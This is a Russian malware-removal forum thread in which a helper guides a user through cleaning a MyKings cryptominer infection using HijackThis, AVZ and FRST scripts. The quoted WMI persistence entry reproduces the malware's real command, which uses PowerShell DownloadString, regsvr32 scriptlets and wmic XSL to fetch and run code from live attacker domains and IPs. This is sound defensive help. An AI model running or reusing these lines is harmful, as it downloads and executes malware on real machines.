Показано с 1 по 11 из 11.

Заражен MyKings (Trojan.W32.Miner) (заявка № 227106)

  1. 24.08.2021, 13:23 #1
    lexperience
    lexperience вне форума
    Junior Member Репутация
    Регистрация
    24.08.2021
    Сообщений
    6
    Вес репутации
    10

    Заражен MyKings (Trojan.W32.Miner)

    CollectionLog-2021.08.24-12.58.zip
    Появляется conhoy.exe
    Удаляешь его и он вновь появляется раз в 3 часа.
    Вызывает это PowerShell скрипт который запускает что-то из папки C:\Windows\Fonts\Fonts\
    Ответить с цитированием Ответить с цитированием
  2.  Будь в курсе! Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     
  3. 24.08.2021, 13:25 #2
    Info_bot
    Info_bot вне форума
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) lexperience, спасибо за обращение на наш форум!

    Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
    Ответить с цитированием Ответить с цитированием
  4. 24.08.2021, 22:05 #3
    Vvvyg
    Vvvyg вне форума
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,502
    Вес репутации
    1058
    Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:
    Код:
    O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://155.94.235.39:8039/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
    Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:
    Код:
    begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('C:\Users\user\AppData\Local\syslog\syslog.exe', '');
 QuarantineFile('c:\windows\fonts\fonts\svchost.exe', '');
 QuarantineFile('C:\windows\fonts\My\svchost.exe', '');
 QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', '');
 QuarantineFile('C:\Windows\Fonts\smss.exe', '');
 QuarantineFile('C:\Windows\Microsoft.NET\Microsoft\svchost.exe', '');
 QuarantineFile('C:\Windows\system32\ftp2.txt', '');
 QuarantineFile('C:\Windows\system32\ftp5.txt', '');
 QuarantineFile('c:\windows\web\1.exe', '');
 QuarantineFile('c:\windows\web\2.exe', '');
 QuarantineFile('c:\windows\web\3.exe', '');
 QuarantineFile('c:\windows\web\n.exe', '');
 DeleteFile('C:\Program Files\Avast Software\Avast\AvEmUpdate.exe', '32');
 DeleteFile('C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe', '64');
 DeleteFile('C:\Program Files\Common Files\avast software\overseer\overseer.exe', '64');
 DeleteFile('C:\Users\user\AppData\Local\syslog\syslog.exe', '64');
 DeleteFile('c:\windows\fonts\fonts\svchost.exe', '64');
 DeleteFile('C:\windows\fonts\My\svchost.exe', '64');
 DeleteFile('C:\Windows\Fonts\Mysql\svchost.exe', '64');
 DeleteFile('C:\Windows\Fonts\smss.exe', '');
 DeleteFile('C:\Windows\Microsoft.NET\Microsoft\svchost.exe', '64');
 DeleteFile('C:\Windows\system32\ftp2.txt', '64');
 DeleteFile('C:\Windows\system32\ftp5.txt', '64');
 DeleteFile('c:\windows\web\1.exe', '64');
 DeleteFile('c:\windows\web\2.exe', '64');
 DeleteFile('c:\windows\web\3.exe', '64');
 DeleteService('aswbIDSAgent');
 DeleteService('avast! Antivirus');
 DeleteService('ECSIoDriver_1_1_0_0');
 DeleteService('MicrosoftMysql');
 DeleteService('niarbk');
 DeleteService('nibffrk');
 DeleteService('nicdrk');
 DeleteService('Nidaq32k');
 DeleteService('nidevldu');
 DeleteService('nidimk');
 DeleteService('nidmmk');
 DeleteService('nidmxfk');
 DeleteService('nidsark');
 DeleteService('niesrk');
 DeleteService('nilvaik');
 DeleteService('nimdbgk');
 DeleteService('nimdsk');
 DeleteService('nimru2k');
 DeleteService('nimsdrk');
 DeleteService('nimslk');
 DeleteService('nimsrlk');
 DeleteService('nimstsk');
 DeleteService('nimxdfk');
 DeleteService('nimxpk');
 DeleteService('niorbk');
 DeleteService('NIPALK');
 DeleteService('nipxirmk');
 DeleteService('nipxirmu');
 DeleteService('niscdk');
 DeleteService('nisdigk');
 DeleteService('nispdk');
 DeleteService('nissrk');
 DeleteService('nistc2k');
 DeleteService('nistck');
 DeleteService('nistcrk');
 DeleteService('niswdk');
 DeleteService('nitiork');
 DeleteService('niwfrk');
 DeleteService('nixsrk');
 DeleteService('OfficeSoft');
 DeleteService('QHActiveDefense');
 DeleteService('UbarCalloutDriver');
 DeleteService('WinIniter');
 DeleteService('WinIniters');
 DeleteFileMask('c:\users\user\appdata\local\syslog', '*', true);
 DeleteDirectory('c:\users\user\appdata\local\syslog');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{472083B0-C522-11CF-8763-00608CC02F24}', 'x64');
 RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QHSafeTray', 'x64');
 DeleteSchedulerTask('{5E3166BF-0DAF-47A1-BB40-63171950E5CE}');
 DeleteSchedulerTask('syslog');
 DeleteSchedulerTask('Update2');
 DeleteSchedulerTask('Update3');
 DeleteSchedulerTask('Update4');
 DeleteSchedulerTask('Windows_Update');
 DeleteSchedulerTask('WindowsUpdate1');
 DeleteSchedulerTask('WindowsUpdate3');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

    Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".
    Код:
    >>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program\Kerbal Space Program.lnk"      -> ["D:\КСП\Kerbal Space Program\KSP_x64.exe"]
>>>  "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WXtoImg\Manual.lnk"        -> ["C:\Program Files (x86)\WXtoImg\wxgui.pdf"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program\Удалить игру.lnk"    -> ["D:\КСП\Kerbal Space Program\unins000.exe"]
>>>  "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Orbitron Screen Saver.lnk"        -> ["C:\Windows\System32\Orbitron.scr"]
>>>  "C:\Users\user\Desktop\Программы для работы\Google Earth.lnk"     -> ["C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Scratch\Scratch.lnk"  -> ["C:\Program Files (x86)\Scratch\Scratch.exe"  =>> "C:\Program Files (x86)\Scratch\Scratch.image"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Scratch\Uninstall Scratch.lnk"  -> ["C:\Program Files (x86)\Scratch\uninstall.exe"]
>>>  "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UmmyVideoDownloader\Help\Русский.lnk"          -> ["C:\Users\user\AppData\Local\UmmyVideoDownloader\1.7.2.4\help\Ummy_rus.pdf"]
>>>  "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UmmyVideoDownloader\Help\English.lnk"          -> ["C:\Users\user\AppData\Local\UmmyVideoDownloader\1.7.2.4\help\Ummy_eng.pdf"]
>>>  "C:\Users\user\Desktop\Другие программы\Google Earth Pro.lnk"     -> ["C:\Program Files (x86)\Google\Google Earth Pro\client\googleearth.exe"]
>>>  "C:\Users\user\Desktop\Программы для работы\Skype.lnk"  -> ["C:\Program Files (x86)\Skype\Phone\Skype.exe"]
>>>  "C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Viber.lnk"          -> ["C:\Users\user\AppData\Local\Viber\Viber.exe"  =>> ShareFiles]
>>>  "C:\Users\user\Desktop\Игры\Epic Games Launcher.lnk"    -> ["D:\эпикгамес\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe"]
>>>  "C:\Users\user\Downloads\Файлы Mail.Ru Агента\Mail.ru Agent\Можно\neptun2\neptun2\A.PIF"        -> ["C:\WORKING\NEPTUN\A.EXE"]
>>>  "C:\Users\user\Downloads\Файлы Mail.Ru Агента\Mail.ru Agent\Можно\neptun2\neptun2\N.PIF"        -> ["C:\WORKING\NEPTUN\N.EXE"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk"          -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"]
>>>  "C:\Users\Public\Desktop\360 Total Security.lnk"        -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Уязвимости.lnk"        -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"  =>> /leakfix]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Borland C++Builder 6\Help\Intranet ActiveX Online Help.lnk"   -> ["C:\Program Files (x86)\Borland\CBuilder6\Help\nia.hlp"]
>>>  "C:\Users\user\Desktop\Другие программы\Movavi Video Editor 15.lnk"         -> ["E:\Movavi\Movavi Video Editor 15\VideoEditor.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Super Bunny man\Деинсталлировать awd.lnk"           -> ["D:\Super Bunny Man\Super Bunny Man\Super Bunny man\Uninstall\unins000.exe"]
    Отчёт о работе прикрепите.

    Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

    Нажмите кнопку Сканировать.

    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim
    Ответить с цитированием Ответить с цитированием

  5. Это понравилось:

    lexperience
  6. 25.08.2021, 00:02 #4
    lexperience
    lexperience вне форума
    Junior Member Репутация
    Регистрация
    24.08.2021
    Сообщений
    6
    Вес репутации
    10
    Вот отчеты
    Вложения Вложения
    Ответить с цитированием Ответить с цитированием
  7. 25.08.2021, 07:55 #5
    Vvvyg
    Vvvyg вне форума
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,502
    Вес репутации
    1058
    Выделите и скопируйте в буфер обмена следующий код:
    Код:
    Start::
CreateRestorePoint:
GroupPolicy: Ограничение - Chrome <==== ВНИМАНИЕ
Task: {01C18C21-ECEA-4B5E-AD03-46CDBFA8042E} - \Mysa -> Нет файла <==== ВНИМАНИЕ
Task: {0CE665BC-7A55-4FC4-B8F6-478A1889C016} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {23BCF218-F9A3-453C-9B50-1AC3982E5D3E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\avast software\overseer\overseer.exe [1760360 2020-08-29] (Avast Software s.r.o. -> Avast Software)
Task: {3A820F8D-4A74-4235-A585-A86D265A4530} - \ok -> Нет файла <==== ВНИМАНИЕ
Task: {5F5278CB-0A8E-46E1-AF1F-B6A5413C39AD} - \oka -> Нет файла <==== ВНИМАНИЕ
Task: {6B17F88A-CBED-4107-ABA6-1C0F4587C3DC} - \Mysa1 -> Нет файла <==== ВНИМАНИЕ
Task: {DAF93FCE-EDC8-49A5-AD2A-344C4439ACDF} - \Mysa3 -> Нет файла <==== ВНИМАНИЕ
Task: {E394AFCF-5D66-46D4-92C5-86C3CC99AA86} - \Mysa2 -> Нет файла <==== ВНИМАНИЕ
Task: C:\Windows\Tasks\Avast Emergency Update.job => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe
CHR HKU\S-1-5-21-2322360559-2472836408-2810273341-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [glcimepnljoholdmjchkloafkggfoijh]
S2 IPSAFES; C:\Windows\Fonts\lsass.exe [0 2019-08-12] () <==== ВНИМАНИЕ (нулевой байт Файл/Папка)
C:\Windows\Fonts\lsass.exe
S3 aswbIDSAgent; "C:\Program Files\Avast Software\Avast\aswidsagent.exe" [X]
S2 avast! Antivirus; "C:\Program Files\Avast Software\Avast\AvastSvc.exe" /runassvc [X]
2019-08-12 12:13 - 2019-08-12 12:13 - 000000000 ____D () C:\ProgramData\svhost.exe
2016-12-18 18:10 - 2016-12-18 18:10 - 000000001 _RHOT () C:\Program Files\My Web Shield
2016-12-18 18:10 - 2016-12-18 18:10 - 000000001 _RHOT () C:\Program Files\UBar
2016-12-18 18:10 C:\Program Files (x86)\Smart Application Controller
2016-12-18 18:10 C:\Program Files (x86)\Youtube AdBlock
2016-12-18 18:10 C:\ProgramData\hdtask
2016-12-18 18:10 C:\ProgramData\UBar
2016-12-18 18:10 C:\Users\user\AppData\Roaming\PBot
2016-12-18 18:10 C:\Users\user\AppData\Roaming\PriceNavigator
2016-12-18 18:10 C:\Users\user\AppData\Roaming\SimpleCalculator
2016-12-18 18:10 C:\Users\user\AppData\Roaming\Smart Application Controller
2016-12-18 18:10 C:\Users\user\AppData\Roaming\VulcanLinks
2016-12-18 18:10 C:\Users\user\AppData\Local\calk
2016-12-18 18:10 C:\Users\user\AppData\Local\fupdate
S2 conhost; C:\Program Files (x86)\Google\13994553.dll [X]
R1 360AntiHacker; C:\Windows\System32\Drivers\360AntiHacker64.sys [190680 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
S3 360AvFlt; C:\Windows\System32\DRIVERS\360AvFlt.sys [86248 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
R1 360Box64; C:\Windows\System32\DRIVERS\360Box64.sys [337280 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
S3 360Camera; C:\Windows\System32\Drivers\360Camera64.sys [49088 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
R1 360FsFlt; C:\Windows\System32\DRIVERS\360FsFlt.sys [457672 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
S4 360Hvm; C:\Windows\System32\Drivers\360Hvm64.sys [322944 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360安全中心)
S3 360netmon; C:\Windows\System32\DRIVERS\360netmon.sys [87672 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
R1 BAPIDRV; C:\Windows\System32\DRIVERS\BAPIDRV64.sys [219520 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn)
U3 aswbdisk; отсутствует ImagePath
U3 aswblog; отсутствует ImagePath
C:\Windows\System32\Drivers\360AntiHacker64.sys
C:\Windows\System32\DRIVERS\360AvFlt.sys
C:\Windows\System32\DRIVERS\360Box64.sys
C:\Windows\System32\Drivers\360Camera64.sys
C:\Windows\System32\DRIVERS\360FsFlt.sys
C:\Windows\System32\Drivers\360Hvm64.sys
C:\Windows\System32\DRIVERS\360netmon.sys
C:\Windows\System32\DRIVERS\BAPIDRV64.sys
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers4: [SD360] -> {086F171D-5ED1-4ED2-B736-CFF3AD6A128E} => C:\Program Files (x86)\360\Total Security\MenuEx64.dll -> Нет файла
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла
ContextMenuHandlers6: [SD360] -> {086F171D-5ED1-4ED2-B736-CFF3AD6A128E} => C:\Program Files (x86)\360\Total Security\MenuEx64.dll -> Нет файла
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\72983560.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\72983560.sys => ""="Driver"
SearchScopes: HKU\S-1-5-21-2322360559-2472836408-2810273341-1000 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
BHO-x32: Поиск@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\user\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll => Нет файла
BHO-x32: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program Files (x86)\360\Total Security\safemon\safemon.dll => Нет файла
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll => Нет файла
MSCONFIG\startupreg: ctfmon => C:\Windows\Fonts\lsass.exe
C:\Program Files (x86)\360\Total Security
FirewallRules: [{CCC877C1-0690-4257-9542-61B4F09614B8}] => (Allow) C:\Program Files\UBar\ubar.exe => Нет файла
FirewallRules: [TCP Query User{6795AA6A-9235-4468-8ED8-81C0673914A9}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe => Нет файла
FirewallRules: [UDP Query User{7A13CE18-5EDE-4311-85C0-EE0791111BEC}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe => Нет файла
FirewallRules: [TCP Query User{8548ED64-D023-444F-BB6C-168A11BAA40E}C:\users\user\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\user\appdata\local\mediaget2\mediaget.exe => Нет файла
FirewallRules: [UDP Query User{172CF716-F833-4FCF-BEF7-8C421C681213}C:\users\user\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\user\appdata\local\mediaget2\mediaget.exe => Нет файла
FirewallRules: [TCP Query User{9AFDE64F-8C66-4A88-9574-91F10E233A17}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{3A3E7546-0204-4702-90AC-CC92E38DCF2C}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{3D294330-B21D-4240-ABF4-6E79387B3A84}D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe => Нет файла
FirewallRules: [UDP Query User{D4B21FAA-2A83-4456-9965-4C83E8C48BD1}D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe => Нет файла
FirewallRules: [TCP Query User{29F98A47-8F9E-4E23-A218-9984D38EB176}D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe => Нет файла
FirewallRules: [UDP Query User{6BE6EFC4-5A4F-4957-BA20-47486CCC6C15}D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe => Нет файла
FirewallRules: [TCP Query User{AF36DDC7-221D-4753-BA88-CFA1F348FB7C}D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe => Нет файла
FirewallRules: [UDP Query User{BCE3AF80-0ACD-4D25-A3B8-7B1152232DB9}D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe => Нет файла
FirewallRules: [TCP Query User{C50544F2-1E96-4031-A068-302E95DCC223}D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe => Нет файла
FirewallRules: [UDP Query User{A3319220-92CD-4EFC-AF56-DB03426EED15}D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe => Нет файла
FirewallRules: [TCP Query User{674E2599-23BA-4BBF-8AFB-6E2212EA6BD3}D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{CF339C0E-21C0-4CFD-9EC8-42E3AD92E5E3}D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{7D979D98-9A73-4B8C-99A3-C2AF556A1096}C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe] => (Allow) C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe => Нет файла
FirewallRules: [UDP Query User{40BDD61E-4A62-45B2-8632-923FBAAF2D85}C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe] => (Allow) C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe => Нет файла
FirewallRules: [{8ADD07F2-9134-418F-BA1F-6315F36D6029}] => (Allow) D:\Winamp\winamp.exe => Нет файла
FirewallRules: [{546A58F9-FE2E-4C76-A006-E3F25BED7B39}] => (Allow) D:\Winamp\winamp.exe => Нет файла
FirewallRules: [TCP Query User{1AFF9F98-FFC3-4D0A-93AE-C38EFBDC92BF}C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe] => (Allow) C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe => Нет файла
FirewallRules: [UDP Query User{F5930C31-7A32-4C9A-BDCC-BC58FD23BAE0}C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe] => (Allow) C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe => Нет файла
FirewallRules: [TCP Query User{6A4584F6-D362-4FC6-A731-89101AF3F4DB}D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe] => (Block) D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{087E997D-9C78-47AA-882C-07ADAEAA2B09}D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe] => (Block) D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{481AD368-8107-4CA6-BB62-503575B2C84A}D:\1\инпу нептун-мэ\server\simulator.exe] => (Allow) D:\1\инпу нептун-мэ\server\simulator.exe => Нет файла
FirewallRules: [UDP Query User{56FA2711-ACEC-40C6-ACE6-75D2F47FA8CD}D:\1\инпу нептун-мэ\server\simulator.exe] => (Allow) D:\1\инпу нептун-мэ\server\simulator.exe => Нет файла
FirewallRules: [{6A861891-2505-4EF2-BC1E-7CF08974F695}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\tcpcom.exe => Нет файла
FirewallRules: [{0805A51D-B04C-4363-96E4-32761C90EA78}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\tcpcom.exe => Нет файла
FirewallRules: [{1245AFDE-E5BF-405A-B82B-F7146BEBC8B3}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\onlineactivator.exe => Нет файла
FirewallRules: [{F0265202-48EA-437D-9B2F-A0FB88DE4725}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\onlineactivator.exe => Нет файла
FirewallRules: [{5F5747B9-6C1C-4235-92F7-52E77C9019F4}] => (Block) LPort=139
FirewallRules: [{4DFFC814-BFF6-441E-A699-4700CCB82ED5}] => (Block) LPort=445
FirewallRules: [{E50F0281-E106-4EE6-8752-225204036708}] => (Block) LPort=139
FirewallRules: [{C1AD65BA-C529-45D2-8E6C-EF0ADBE88F58}] => (Block) LPort=445
FirewallRules: [{3B91FDD6-96EC-460C-BF48-BDA5312F5FDA}] => (Block) LPort=139
FirewallRules: [{A8BD5F90-6A39-4141-BBEA-1EA2FDD4154F}] => (Block) LPort=445
FirewallRules: [{E106989E-349D-425D-A870-B1EE565108EE}] => (Block) LPort=139
FirewallRules: [{89277402-E6B1-4AFC-B0D1-5982D37A1D43}] => (Block) LPort=445
FirewallRules: [{1011CF0E-26B6-4D68-8AF9-4C11B0079BEE}] => (Block) LPort=139
FirewallRules: [{5CF5ED9F-6DE7-4DB6-AB4B-DCF1A66C877E}] => (Block) LPort=445
FirewallRules: [{C77F0541-62AA-4696-8B33-16CA497D0CA7}] => (Block) LPort=139
FirewallRules: [{FD592B4B-25A3-4833-AD0D-2D663552C49D}] => (Block) LPort=445
FirewallRules: [{C5055AF4-9C15-4B0B-A83B-9163D6106A68}] => (Block) LPort=139
FirewallRules: [{5A17AB39-E438-45D7-B729-9D25888DB836}] => (Block) LPort=445
FirewallRules: [{F62D4A98-F6FA-4365-A734-4DBD6D5990E4}] => (Block) LPort=139
FirewallRules: [{C7A8193D-3910-420B-967B-093B37418C2A}] => (Block) LPort=445
FirewallRules: [{2CE93B8E-C0B4-4587-A4F7-2B21C91A7697}] => (Block) LPort=139
FirewallRules: [{5E682B40-5C84-4622-978C-5863322E58EF}] => (Block) LPort=445
FirewallRules: [{91628AFE-586D-48A3-B6CE-326B784D50CF}] => (Block) LPort=139
FirewallRules: [{2643AC6F-C3C2-4A01-86CB-9E086DF062A4}] => (Block) LPort=445
FirewallRules: [{59378E9A-57F1-4C01-B6DB-B08A9C18889A}] => (Block) LPort=139
FirewallRules: [{BADA7B63-02BE-49F5-8427-4D82A8760F22}] => (Block) LPort=445
FirewallRules: [{0C62F18D-82FE-4A1A-843D-D2D176AA131A}] => (Block) LPort=139
FirewallRules: [{DBF10C81-44E5-4F52-B55F-00C14C4C19D0}] => (Block) LPort=445
